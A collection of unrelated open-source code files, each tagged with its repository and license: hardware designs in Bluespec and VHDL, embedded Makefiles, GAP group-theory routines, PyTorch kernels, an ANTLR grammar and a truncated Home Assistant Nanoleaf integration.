method ActionValue#(Maybe#(Bit#(TLog#(num)))) getStuckIdx; // get deadlock MSHR idx
method Action initEntry(Bit#(TLog#(num)) n); // new MSHR entry allocated
method Action releaseEntry(Bit#(TLog#(num)) n); // existing MSHR entry released
endinterface
module mkMshrDeadlockChecker(MshrDeadlockChecker#(num)) provisos(
Alias#(idxT, Bit#(TLog#(num)))
);
Integer check_port = 0;
Integer incr_port = 1;
// timer for each entry to detect deadlock: being processed for 64M cycles
Vector#(num, Ehr#(2, Maybe#(DeadlockTimer))) timer <- replicateM(mkEhr(Invalid));
// when new entry is allocated, init timer
Vector#(num, PulseWire) init <- replicateM(mkPulseWire);
// when existing entry is released, end the timer
Vector#(num, PulseWire) done <- replicateM(mkPulseWire);
(* fire_when_enabled, no_implicit_conditions *)
rule incrTimer;
for(Integer i = 0; i < valueof(num); i = i+1) begin
if(init[i]) begin
timer[i][incr_port] <= Valid (0);
end
else if(done[i]) begin
timer[i][incr_port] <= Invalid;
end
else if(timer[i][incr_port] matches tagged Valid .t &&& t != maxBound) begin
timer[i][incr_port] <= Valid (t + 1);
end
end
endrule
method ActionValue#(Maybe#(idxT)) getStuckIdx;
function Bool isDeadlock(Integer i);
return timer[i][check_port] == Valid (maxBound);
endfunction
Vector#(num, Integer) idxVec = genVector;
if(searchIndex(isDeadlock, idxVec) matches tagged Valid .n) begin
timer[n][check_port] <= Valid (0);
return Valid (n);
end
else begin
return Invalid;
end
endmethod
method Action initEntry(idxT n);
init[n].send;
endmethod
method Action releaseEntry(idxT n);
done[n].send;
endmethod
endmodule
| Bluespec | 4 | faddat/Flute | src_Core/Near_Mem_VM_WB_L1_L2/src_LLCache/coherence/src/MshrDeadlockChecker.bsv | [
"Apache-2.0"
] |
----------------------------------------------------------------------------------
-- Engineer: Mike Field <hamster@snap.net.nz>
--
-- Module Name: icmp_extract_icmp_header - Behavioral
--
-- Description: Remove the ICMP header details off of the data packet
-- and pass the data on if valid.
--
------------------------------------------------------------------------------------
-- FPGA_Webserver from https://github.com/hamsternz/FPGA_Webserver
------------------------------------------------------------------------------------
-- The MIT License (MIT)
--
-- Copyright (c) 2015 Michael Alan Field <hamster@snap.net.nz>
--
-- Permission is hereby granted, free of charge, to any person obtaining a copy
-- of this software and associated documentation files (the "Software"), to deal
-- in the Software without restriction, including without limitation the rights
-- to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
-- copies of the Software, and to permit persons to whom the Software is
-- furnished to do so, subject to the following conditions:
--
-- The above copyright notice and this permission notice shall be included in
-- all copies or substantial portions of the Software.
--
-- THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
-- IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
-- FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
-- AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
-- LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
-- OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
-- THE SOFTWARE.
--
----------------------------------------------------------------------------------
library IEEE;
use IEEE.STD_LOGIC_1164.ALL;
use IEEE.NUMERIC_STD.ALL;
entity icmp_extract_icmp_header is
Port ( clk : in STD_LOGIC;
data_valid_in : in STD_LOGIC;
data_in : in STD_LOGIC_VECTOR (7 downto 0);
data_valid_out : out STD_LOGIC := '0';
data_out : out STD_LOGIC_VECTOR (7 downto 0) := (others => '0');
icmp_type : out STD_LOGIC_VECTOR (7 downto 0) := (others => '0');
icmp_code : out STD_LOGIC_VECTOR (7 downto 0) := (others => '0');
icmp_checksum : out STD_LOGIC_VECTOR (15 downto 0) := (others => '0');
icmp_identifier : out STD_LOGIC_VECTOR (15 downto 0) := (others => '0');
icmp_sequence : out STD_LOGIC_VECTOR (15 downto 0) := (others => '0'));
end icmp_extract_icmp_header;
architecture Behavioral of icmp_extract_icmp_header is
signal count : unsigned(3 downto 0) := (others => '0');
signal i_icmp_type : STD_LOGIC_VECTOR (7 downto 0) := (others => '0');
signal i_icmp_code : STD_LOGIC_VECTOR (7 downto 0) := (others => '0');
signal i_icmp_checksum : STD_LOGIC_VECTOR (15 downto 0) := (others => '0');
signal i_icmp_identifier : STD_LOGIC_VECTOR (15 downto 0) := (others => '0');
signal i_icmp_sequence : STD_LOGIC_VECTOR (15 downto 0) := (others => '0');
begin
icmp_type <= i_icmp_type;
icmp_code <= i_icmp_code;
icmp_checksum <= i_icmp_checksum;
icmp_identifier <= i_icmp_identifier;
icmp_sequence <= i_icmp_sequence;
process(clk)
begin
if rising_edge(clk) then
data_out <= data_in;
if data_valid_in = '1' then
-- Note, at count of zero,
case count is
when "0000" => i_icmp_type <= data_in;
when "0001" => i_icmp_code <= data_in;
when "0010" => i_icmp_checksum(7 downto 0) <= data_in;
when "0011" => i_icmp_checksum(15 downto 8) <= data_in;
when "0100" => i_icmp_identifier(7 downto 0) <= data_in;
when "0101" => i_icmp_identifier(15 downto 8) <= data_in;
when "0110" => i_icmp_sequence(7 downto 0) <= data_in;
when "0111" => i_icmp_sequence(15 downto 8) <= data_in;
when others => if i_icmp_type = x"08" and i_icmp_code = x"00" then
data_valid_out <= data_valid_in;
data_out <= data_in;
else
data_valid_out <= '0';
data_out <= (others => '0');
end if;
end case;
if count /= "1111" then
count <= count+1;
end if;
else
data_valid_out <= '0';
data_out <= data_in;
count <= (others => '0');
end if;
end if;
end process;
end Behavioral;
| VHDL | 5 | hamsternz/FPGA_Webserver | hdl/icmp/icmp_extract_icmp_header.vhd | [
"MIT"
] |
|v|
"creates an vector that holds up to 20 elements"
v: vector copySize: 20.
"access the first element"
v first printLine.
"access the 10th element"
(v at: 9) printLine.
"put 100 as second value"
vat: 1 Put: 100.
| Self | 4 | LaudateCorpus1/RosettaCodeData | Task/Arrays/Self/arrays-4.self | [
"Info-ZIP"
] |
build: components slick.js slick.css
@component build --dev
components: component.json
@component install --dev
.PHONY: clean
| Makefile | 3 | wiratmoko11/adibuana-web | assets/vendors/slick-carousel/Makefile | [
"MIT"
] |
#
# Generic and Simple Atmel AVR GNU Makefile
#
# Desinged for the gnu-avr tool chain
#
# Universal 8bit Graphics Library
#
# Copyright (c) 2012, olikraus@gmail.com
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this list
# of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice, this
# list of conditions and the following disclaimer in the documentation and/or other
# materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
# CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Features
# - upload
# - create exe from library
# - create assembler listing (.dis)
#
# Limitations
# - only C-files supported
# - no automatic dependency checking (call 'make clean' if any .h files are changed)
#
# Targets:
# make
# create hex file, no upload
# make upload
# create and upload hex file
# make clean
# delete all generated files
#
# Note:
# Display list make database: make -p -f/dev/null | less
#================================================
# Project Information
TARGETNAME = u8g_main
MCU:=msp430f5529
DMCU:=__MSP430F5529__
F_CPU:=16000000
MSRC = main.c
U8GDIR = ../../../csrc/
FONTDIR = ../../../sfntsrc/
#================================================
# System/Environment Information
TIPATH:=/usr/local/ti/ccsv6
MSP430GCC:=gcc_msp430_4.9.14r1_10
TOOLSPATH:=$(TIPATH)/tools/compiler/$(MSP430GCC)/bin/
# Add proper arguments for tiflahser
MSP430HEX:=
#================================================
# Main part of the Makefile starts here. Usually no changes are needed.
# Append U(G Library
SRC = system_pre_init.c
SRC += $(shell ls $(U8GDIR)*.c)
SRC += $(shell ls $(FONTDIR)*.c)
# Internal Variable Names
LIBNAME:=$(TARGETNAME).a
ELFNAME:=$(TARGETNAME).elf
HEXNAME:=$(TARGETNAME).hex
DISNAME:=$(TARGETNAME).dis
OBJ := $(SRC:.c=.o)
MOBJ := $(MSRC:.c=.o)
# GNU compiler
CC = $(TOOLSPATH)msp430-elf-gcc
CXX = $(TOOLSPATH)msp430-elf-g++
AR = $(TOOLSPATH)msp430-elf-ar
# GNU Tools
OBJCOPY:=$(TOOLSPATH)msp430-elf-objcopy
OBJDUMP:=$(TOOLSPATH)msp430-elf-objdump
SIZE:=$(TOOLSPATH)msp430-elf-size
# C flags
COMMON_FLAGS = -DF_CPU=$(F_CPU) -D$(DMCU) -mmcu=$(MCU)
COMMON_FLAGS += -g -Os -Wall -funsigned-char -funsigned-bitfields -fpack-struct -fshort-enums
COMMON_FLAGS += -I. -I$(U8GDIR) -I$(TIPATH)/ccs_base/msp430/include_gcc
COMMON_FLAGS += -ffunction-sections -fdata-sections -Wl,--gc-sections
COMMON_FLAGS += -Wl,--relax
COMMON_FLAGS +=
CFLAGS = $(COMMON_FLAGS) -std=gnu99 -Wstrict-prototypes
# Linker script
LDLIBS = -T $(TIPATH)/ccs_base/msp430/include_gcc/$(MCU).ld
# Additional Suffixes
.SUFFIXES: .elf .hex .dis
# Targets
.PHONY: all
all: $(DISNAME) $(HEXNAME)
$(SIZE) $(ELFNAME)
.PHONY: upload
upload: $(DISNAME) $(HEXNAME)
$(SIZE) $(ELFNAME)
.PHONY: clean
clean:
$(RM) $(HEXNAME) $(ELFNAME) $(LIBNAME) $(DISNAME) $(OBJ) $(MOBJ)
# implicit rules
.elf.hex:
$(OBJCOPY) -O ihex -R .eeprom $< $@
# explicit rules
$(ELFNAME): $(LIBNAME)($(OBJ)) $(MOBJ)
$(LINK.o) $(COMMON_FLAGS) $(MOBJ) $(LIBNAME) $(LOADLIBES) $(LDLIBS) -o $@
$(DISNAME): $(ELFNAME)
$(OBJDUMP) -S $< > $@
| Gnuplot | 4 | JJPowelly/u8glib | sys/msp430/chess/Makefile.gnu | [
"BSD-2-Clause"
] |
##############################################################
##
## Helps compute the decomposition of
## the ramification module and the equivariant
## degree of a multiple of a simple orbit for
## the modular curves X(p) with automorphism group
## G = PSL(2,p), p a prime.
##
## Using these computations and Borne's formula, the
## G-module structure of the RR spaces of equivariant
## divisors can be determined explicitly.
##
## Reference: D. Joyner and A. Ksir, "Modular representations
## on some Riemann-Roch spaces of modular curves
## $X(N)$, Computational Aspects of Algebraic Curves,
## (Editor: T. Shaska) Lecture Notes in Computing,
## WorldScientific, 2005.)
##
##
## 12-30-2004, wdj
###########################################################
## To read this in, use for example:
### Read("/home/wdj/gapfiles/curves/mod_crv_aut_gp3.gap");
## To log your results, use for example:
### LogTo("/home/wdj/gapfiles/mod_crv_aut_gp1.log");
ram_module_X:=function(p)
## p is a prime
## output is [m1,...,mn]
## where n = # conj classes of G=PSL(2,p)
## and mi = mult of pi_i in ram mod of modular curve
## X with AutGp(X) = G.
## Here Irr(G) = [pi_1,...,pi_n] (in that order).
##
local G,i,j,n,n0,H,G1,H_chars,CG,G_chars,w,m,theta,pi_theta_to_the;
G:=PSL(2,p);
H:=[];
H_chars:=[];
n0:=[ [ Z(p)^0, Z(p) ], [ Z(p)*0, Z(p)^0 ] ];
CG:=ConjugacyClassesSubgroups(G);
H[1]:=Representative(CG[2]); # size 2
H[2]:=Representative(CG[3]); # size 3
n :=Size(CG);
for i in [1..n] do
if Size(Representative(CG[i]))=p then
H[3]:=Representative(CG[i]);
fi;
od;
## H[3]:=Group(n0); # size p
for i in [1..Size(H)] do
H_chars[i]:=Irr(H[i]);
od;
G_chars:=Irr(G);
m:=[];
m[1]:=[];m[2]:=[];m[3]:=[];
theta:=List([1..3],i->H_chars[i][2]);
pi_theta_to_the:=List([1..3],i->Sum([1..(Size(H[i])-1)],
j->j*InducedClassFunction(theta[i]^(j),G)));
#Print("\n\n pi_theta_to_the = ",Sum(pi_theta_to_the),"\n\n");
for i in [1..3] do
m[i]:=List(G_chars, pi->ScalarProduct(pi_theta_to_the[i],pi))/Size(H[i]);
od;
#Print("\n\n m = ",m,"\n\n");
return Sum(m);
end;
#ram_module_X(5);
#[ 0, 3, 3, 4, 5 ]
#ram_module_X(7);
#[ 0, 4, 3, 6, 7, 8 ]
#ram_module_X(11);
#[ 0, 5, 6, 11, 10, 12, 12, 12 ]
#ram_module_X(13);
#[ 0, 7, 7, 13, 13, 13, 13, 14, 15 ]
#ram_module_X(17);
#[ 0, 9, 9, 18, 17, 17, 17, 18, 18, 19, 19 ]
#ram_module_X(19);
#[ 0, 9, 10, 20, 20, 19, 19, 20, 20, 21, 21, 21 ]
#ram_module_X(23);
#[ 0, 14, 11, 24, 24, 24, 23, 23, 25, 25, 25, 25, 25, 25 ]
#ram_module_X(29);
#[ 0, 16, 16, 30, 31, 31, 30, 30, 30, 30, 31, 32, 32, 32, 31, 31, 31 ]
#ram_module_X(31);
#[ 0, 18, 15, 33, 33, 33, 32, 32, 32, 32, 33, 34, 33, 33, 34, 34, 34, 34 ]
#ram_module_X(37);
#[ 0, 20, 20, 39, 39, 39, 39, 39, 39, 39, 39, 39, 39, 40, 39, 41, 41, 41, 40, 40, 40 ]
ram_module_X_JK:=function(p)
## p is a prime
## output is (m1,...,mn)
## where n = # conj classes of G=PSL(2,p)
## and mi = "mult of pi_i in ram mod of G" using JK formula
##
local G,i,j,n,n0,H,G1,H_chars,CG,G_chars,A,B,C,D,pi;
G:=PSL(2,p);
H:=[];
H_chars:=[];
n0:=[ [ Z(p)^0, Z(p) ], [ Z(p)*0, Z(p)^0 ] ];
CG:=ConjugacyClassesSubgroups(G);
H[1]:=Representative(CG[2]); # size 2
H[2]:=Representative(CG[3]); # size 3
n:=Size(CG);
for i in [1..n] do
if Size(Representative(CG[i]))=p then
H[3]:=Representative(CG[i]);
fi;
od;
## H[3]:=Group(n0); # size p
for i in [1..Size(H)] do
H_chars[i]:=Irr(H[i]);
od;
G_chars:=Irr(G);
n:=Length(G_chars);
A:=[];
for i in [1..n] do
pi:=G_chars[i];
A[i]:=ScalarProduct(H_chars[1][1],RestrictedClassFunction(pi,H[1]));
od;
B:=[];
for i in [1..n] do
pi:=G_chars[i];
B[i]:=ScalarProduct(H_chars[2][1],RestrictedClassFunction(pi,H[2]));
od;
C:=[];
for i in [1..n] do
pi:=G_chars[i];
C[i]:=ScalarProduct(H_chars[3][1],RestrictedClassFunction(pi,H[3]));
od;
D:=[];
for i in [1..n] do
pi:=G_chars[i];
D[i]:=DegreeOfCharacter(pi);
od;
return (1/2)*(3*D-A-B-C);
end;
#ram_module_X_JK(5);
#[ 0, 3, 3, 4, 5 ]
#ram_module_X_JK(7);
#[ 0, 7/2, 7/2, 6, 7, 8 ]
#ram_module_X_JK(11);
#[ 0, 11/2, 11/2, 11, 10, 12, 12, 12 ]
#ram_module_X_JK(13);
#[ 0, 7, 7, 13, 13, 13, 13, 15, 14 ]
#ram_module_X_JK(17);
#[ 0, 9, 9, 18, 17, 17, 17, 18, 18, 19, 19 ]
#ram_module_X_JK(19);
#[ 0, 19/2, 19/2, 20, 20, 19, 19, 20, 20, 21, 21, 21 ]
#ram_module_X_JK(23);
#[ 0, 25/2, 25/2, 24, 24, 24, 23, 23, 25, 25, 25, 25, 25, 25 ]
#ram_module_X_JK(29);
#[ 0, 16, 16, 30, 31, 31, 30, 30, 30, 30, 31, 32, 32, 32, 31, 31, 31 ]
pieces_ram_module_X:=function(p)
## p is a prime
## output is (m1,...,mn)
## where n = # conj classes of G=PSL(2,p)
## and mi = mult of pi_i in ram mod of G
##
local G,i,j,n,n0,H,G1,H_chars,CG,G_chars,w,m,theta,pi_theta_to_the;
G:=PSL(2,p);
H:=[];
H_chars:=[];
n0:=[ [ Z(p)^0, Z(p) ], [ Z(p)*0, Z(p)^0 ] ];
CG:=ConjugacyClassesSubgroups(G);
H[1]:=Representative(CG[2]); # size 2
H[2]:=Representative(CG[3]); # size 3
n :=Size(CG);
for i in [1..n] do
if Size(Representative(CG[i]))=p then
H[3]:=Representative(CG[i]);
fi;
od;
## H[3]:=Group(n0); # size p
for i in [1..Size(H)] do
H_chars[i]:=Irr(H[i]);
od;
G_chars:=Irr(G);
m:=[];
m[1]:=[];m[2]:=[];m[3]:=[];
theta:=List([1..3],i->H_chars[i][2]);
pi_theta_to_the:=List([1..3],i->Sum([1..(Size(H[i])-1)],
j->j*InducedClassFunction(theta[i]^(j),G)));
#Print("\n\n pi_theta_to_the = ",Sum(pi_theta_to_the),"\n\n");
for i in [1..3] do
m[i]:=List(G_chars, pi->ScalarProduct(pi_theta_to_the[i],pi));
od;
#Print("\n\n m = ",m,"\n\n");
return m;
end;
equiv_deg_module_X:=function(p,ii,r)
## p is a prime
## ii = 1 for H[1], size 2
## ii = 2 for H[2], size 3
## ii = 3 for H[3], size p
## output is (m1,...,mn)
## where n = # conj classes of G=PSL(2,p)
## and mi = mult of pi_i in deg_equiv module of G
##
local G,i,j,n,n0,H,G1,H_chars,CG,G_chars,w,m,theta,pi_theta,pi_theta_to_the;
G:=PSL(2,p);
H:=[]; # 3 decomp gps
H_chars:=[];
n0:=[ [ Z(p)^0, Z(p) ], [ Z(p)*0, Z(p)^0 ] ];
CG:=ConjugacyClassesSubgroups(G);
H[1]:=Representative(CG[2]); # size 2
H[2]:=Representative(CG[3]); # size 3
n:=Size(CG);
for i in [1..n] do
if Size(Representative(CG[i]))=p then
H[3]:=Representative(CG[i]);
fi;
od;
## H[3]:=Group(n0); # size p
for i in [1..3] do
H_chars[i]:=Irr(H[i]);
od;
G_chars:=Irr(G);
m:=[];
m[1]:=[];m[2]:=[];m[3]:=[];
theta:=List([1..3],i->H_chars[i][2]);
pi_theta_to_the:=List([1..3],i->List([1..r],j->InducedClassFunction(theta[i]^(-j),G)));
for i in [1..3] do
for j in [1..r] do
m[i][j]:=List(G_chars, pi->ScalarProduct(pi_theta_to_the[i][j],pi));
od;
od;
return Sum(m[ii]);
end;
# equiv_deg_module_X(7,2,1);
#[ 0, 1, 1, 2, 2, 3 ]
# equiv_deg_module_X(7,1,1);
#[ 0, 2, 2, 2, 4, 4 ]
# equiv_deg_module_X(7,3,1);
#[ 0, 1, 0, 1, 1, 1 ]
# equiv_deg_module_X(7,3,7);
#[ 1, 3, 3, 6, 7, 8 ]
# equiv_deg_module_X(7,1,2);
#[ 1, 3, 3, 6, 7, 8 ]
| GAP | 5 | bopopescu/sage | src/ext/gap/joyner/modular_crv_rr_sp.gap | [
"BSL-1.0"
] |
#include <ATen/ATen.h>
#include <ATen/native/ForeachUtils.h>
#include <c10/util/irange.h>
namespace at { namespace native {
#define FOREACH_BINARY_OP_SCALAR(OP) \
void foreach_tensor_##OP##_scalar_kernel_slow_(TensorList tensors, const Scalar& scalar) { \
check_foreach_api_restrictions(tensors); \
\
for (auto& t: tensors) { \
t.OP##_(scalar); \
} \
} \
\
std::vector<Tensor> foreach_tensor_##OP##_scalar_kernel_slow(TensorList tensors, const Scalar& scalar) { \
check_foreach_api_restrictions(tensors); \
\
std::vector<Tensor> result; \
result.reserve(tensors.size()); \
for (const auto& t: tensors) { \
result.emplace_back(t.OP(scalar)); \
} \
\
return result; \
}
#define FOREACH_BINARY_OP_SCALARLIST(OP) \
void foreach_tensor_##OP##_scalarlist_kernel_slow_(TensorList tensors, at::ArrayRef<Scalar> scalars) { \
check_foreach_api_restrictions(tensors, scalars); \
\
for (const auto i : c10::irange(tensors.size())) { \
tensors[i].OP##_(scalars[i]); \
} \
} \
\
std::vector<Tensor> foreach_tensor_##OP##_scalarlist_kernel_slow(TensorList tensors, at::ArrayRef<Scalar> scalars) { \
check_foreach_api_restrictions(tensors, scalars); \
std::vector<Tensor> result; \
result.reserve(tensors.size()); \
for (const auto i : c10::irange(tensors.size())) { \
result.emplace_back(tensors[i].OP(scalars[i])); \
} \
\
return result; \
}
#define FOREACH_BINARY_OP_LIST(OP) \
std::vector<Tensor> foreach_tensor_##OP##_list_kernel_slow(TensorList tensors1, TensorList tensors2) { \
check_foreach_api_restrictions(tensors1, tensors2); \
\
std::vector<Tensor> result; \
result.reserve(tensors1.size()); \
for (const auto i : c10::irange(tensors1.size())) { \
result.emplace_back(tensors1[i].OP(tensors2[i])); \
} \
\
return result; \
} \
\
void foreach_tensor_##OP##_list_kernel_slow_(TensorList tensors1, TensorList tensors2) { \
check_foreach_api_restrictions(tensors1, tensors2); \
\
for (const auto i : c10::irange(tensors1.size())) { \
tensors1[i].OP##_(tensors2[i]); \
} \
}
#define FOREACH_BINARY_OP_LIST_ALPHA(OP) \
std::vector<Tensor> foreach_tensor_##OP##_list_kernel_slow(TensorList tensors1, TensorList tensors2, const Scalar& alpha) { \
check_foreach_api_restrictions(tensors1, tensors2); \
\
std::vector<Tensor> result; \
result.reserve(tensors1.size()); \
for (const auto i : c10::irange(tensors1.size())) { \
result.emplace_back(tensors1[i].OP(tensors2[i], alpha)); \
} \
\
return result; \
} \
\
void foreach_tensor_##OP##_list_kernel_slow_(TensorList tensors1, TensorList tensors2, const Scalar& alpha) { \
check_foreach_api_restrictions(tensors1, tensors2); \
\
for (const auto i : c10::irange(tensors1.size())) { \
tensors1[i].OP##_(tensors2[i], alpha); \
} \
}
#define FOREACH_UNARY_OP(OP) \
std::vector<Tensor> foreach_tensor_##OP##_slow(TensorList tensors) { \
check_foreach_api_restrictions(tensors); \
\
std::vector<Tensor> result; \
result.reserve(tensors.size()); \
for (const auto& t : tensors) { \
result.emplace_back(t.OP()); \
} \
\
return result; \
} \
\
void foreach_tensor_##OP##_slow_(TensorList tensors) { \
check_foreach_api_restrictions(tensors); \
\
for (auto& t : tensors) { \
t.OP##_(); \
} \
}
#define FOREACH_POINTWISE_OP_SCALAR(OP) \
std::vector<Tensor> foreach_tensor_##OP##_scalar_slow(TensorList input, TensorList tensors1, TensorList tensors2, const Scalar& scalar) { \
check_foreach_api_restrictions(input, tensors1, tensors2); \
\
std::vector<Tensor> result; \
for(const auto i : c10::irange(input.size())) { \
result.emplace_back(input[i].OP(tensors1[i], tensors2[i], scalar)); \
} \
\
return result; \
} \
\
void foreach_tensor_##OP##_scalar_slow_(TensorList input, TensorList tensors1, TensorList tensors2, const Scalar& scalar) { \
check_foreach_api_restrictions(input, tensors1, tensors2); \
\
for(const auto i : c10::irange(input.size())) { \
input[i].OP##_(tensors1[i], tensors2[i], scalar); \
} \
} \
#define FOREACH_POINTWISE_OP_SCALARLIST(OP) \
std::vector<Tensor> foreach_tensor_##OP##_scalarlist_slow(TensorList input, TensorList tensors1, TensorList tensors2, at::ArrayRef<Scalar> scalars) { \
check_foreach_api_restrictions(input, tensors1, tensors2, scalars); \
\
std::vector<Tensor> result; \
for(const auto i : c10::irange(input.size())) { \
result.emplace_back(input[i].OP(tensors1[i], tensors2[i], scalars[i])); \
} \
\
return result; \
} \
\
void foreach_tensor_##OP##_scalarlist_slow_(TensorList input, TensorList tensors1, TensorList tensors2, at::ArrayRef<Scalar> scalars) { \
check_foreach_api_restrictions(input, tensors1, tensors2, scalars); \
\
for(const auto i : c10::irange(input.size())) { \
input[i].OP##_(tensors1[i], tensors2[i], scalars[i]); \
} \
} \
FOREACH_BINARY_OP_LIST_ALPHA(add);
FOREACH_BINARY_OP_LIST_ALPHA(sub);
FOREACH_BINARY_OP_SCALAR(add);
FOREACH_BINARY_OP_SCALAR(sub);
FOREACH_BINARY_OP_SCALAR(mul);
FOREACH_BINARY_OP_SCALAR(div);
FOREACH_BINARY_OP_SCALARLIST(add);
FOREACH_BINARY_OP_SCALARLIST(sub);
FOREACH_BINARY_OP_SCALARLIST(mul);
FOREACH_BINARY_OP_SCALARLIST(div);
FOREACH_BINARY_OP_LIST(mul);
FOREACH_BINARY_OP_LIST(div);
FOREACH_UNARY_OP(sqrt);
FOREACH_UNARY_OP(exp);
FOREACH_UNARY_OP(abs);
FOREACH_UNARY_OP(acos);
FOREACH_UNARY_OP(asin);
FOREACH_UNARY_OP(atan);
FOREACH_UNARY_OP(ceil);
FOREACH_UNARY_OP(cos);
FOREACH_UNARY_OP(cosh);
FOREACH_UNARY_OP(erf);
FOREACH_UNARY_OP(erfc);
FOREACH_UNARY_OP(expm1);
FOREACH_UNARY_OP(floor);
FOREACH_UNARY_OP(log);
FOREACH_UNARY_OP(log10);
FOREACH_UNARY_OP(log1p);
FOREACH_UNARY_OP(log2);
FOREACH_UNARY_OP(neg);
FOREACH_UNARY_OP(tan);
FOREACH_UNARY_OP(tanh);
FOREACH_UNARY_OP(sin);
FOREACH_UNARY_OP(sinh);
FOREACH_UNARY_OP(round);
FOREACH_UNARY_OP(lgamma);
FOREACH_UNARY_OP(frac);
FOREACH_UNARY_OP(trunc);
FOREACH_UNARY_OP(reciprocal);
FOREACH_UNARY_OP(sigmoid);
FOREACH_POINTWISE_OP_SCALAR(addcdiv);
FOREACH_POINTWISE_OP_SCALAR(addcmul);
FOREACH_POINTWISE_OP_SCALARLIST(addcdiv);
FOREACH_POINTWISE_OP_SCALARLIST(addcmul);
#define FOREACH_MAXIMUM_MINIMUM_OP(NAME) \
std::vector<Tensor> foreach_tensor_##NAME##_slow(TensorList tensors1, TensorList tensors2) { \
check_foreach_api_restrictions(tensors1, tensors2); \
\
std::vector<Tensor> result; \
result.reserve(tensors1.size()); \
for (const auto i : c10::irange(tensors1.size())) { \
result.emplace_back(at::NAME(tensors1[i], tensors2[i])); \
} \
\
return result; \
} \
FOREACH_MAXIMUM_MINIMUM_OP(maximum)
FOREACH_MAXIMUM_MINIMUM_OP(minimum)
void foreach_tensor_zero_slow_(TensorList tensors) {
check_foreach_api_restrictions(tensors);
for (auto& t : tensors) {
t.zero_();
}
}
}} // namespace at::native
| C++ | 5 | Hacky-DH/pytorch | aten/src/ATen/native/ForeachOpsKernels.cpp | [
"Intel"
] |
// Copyright 2010 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// The runtime package contains an uninitialized definition
// for runtime·iscgo. Override it to tell the runtime we're here.
// There are various function pointers that should be set too,
// but those depend on dynamic linker magic to get initialized
// correctly, and sometimes they break. This variable is a
// backup: it depends only on old C style static linking rules.
package cgo
import _ "unsafe" // for go:linkname
//go:linkname _iscgo runtime.iscgo
var _iscgo bool = true
| Go | 2 | Havoc-OS/androidprebuilts_go_linux-x86 | src/runtime/cgo/iscgo.go | [
"BSD-3-Clause"
] |
// @@ANTLR Tool Options@@: -trace
grammar t044trace;
options {
language = JavaScript;
}
a: '<' ((INT '+')=>b|c) '>';
b: c ('+' c)*;
c: INT;
INT: ('0'..'9')+;
WS: (' ' | '\n' | '\t')+ {$channel = HIDDEN;};
| G-code | 4 | DanielMabadeje/Artificial-Intelligence-Deep-Learning-Machine-Learning-Tutorials | java/java2py/antlr-3.1.3/runtime/JavaScript/tests/functional/t044trace.g | [
"Apache-2.0"
] |
"""The Nanoleaf integration."""
from __future__ import annotations
import asyncio
from dataclasses import dataclass
from datetime import timedelta
import logging
from aionanoleaf import (
EffectsEvent,
InvalidToken,
Nanoleaf,
StateEvent,
TouchEvent,
Unavailable,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
CONF_DEVICE_ID,
CONF_HOST,
CONF_TOKEN,
CONF_TYPE,
Platform,
)
from homeassistant.core import HomeAssistant
from homeassistant.exceptions import ConfigEntryAuthFailed
from homeassistant.helpers import device_registry as dr
from homeassistant.helpers.aiohttp_client import async_get_clientsession
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator, UpdateFailed
from .const import DOMAIN, NANOLEAF_EVENT, TOUCH_GESTURE_TRIGGER_MAP, TOUCH_MODELS
_LOGGER = logging.getLogger(__name__)
PLATFORMS = [Platform.BUTTON, Platform.LIGHT]
@dataclass
class NanoleafEntryData:
"""Class for sharing data within the Nanoleaf integration."""
device: Nanoleaf
coordinator: DataUpdateCoordinator
event_listener: asyncio.Task
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Set up Nanoleaf from a config entry."""
nanoleaf = Nanoleaf(
async_get_clientsession(hass), entry.data[CONF_HOST], entry.data[CONF_TOKEN]
)
async def async_get_state() -> None:
"""Get the state of the device."""
try:
await nanoleaf.get_info()
except Unavailable as err:
raise UpdateFailed from err
except InvalidToken as err:
raise ConfigEntryAuthFailed from err
coordinator = DataUpdateCoordinator(
hass,
_LOGGER,
name=entry.title,
update_interval=timedelta(minutes=1),
update_method=async_get_state,
)
await coordinator.async_config_entry_first_refresh()
async def light_event_callback(event: StateEvent | EffectsEvent) -> None:
"""Receive state and effect event."""
coordinator.async_set_updated_data(None)
if supports_touch := nanoleaf.model in TOUCH_MODELS:
device_registry = dr.async_get(hass)
device_entry = device_registry.async_get_or_create(
config_entry_id=entry.entry_id,
identifiers={(DOMAIN, nanoleaf.serial_no)},
)
async def touch_event_callback(event: TouchEvent) -> None:
"""Receive touch event."""
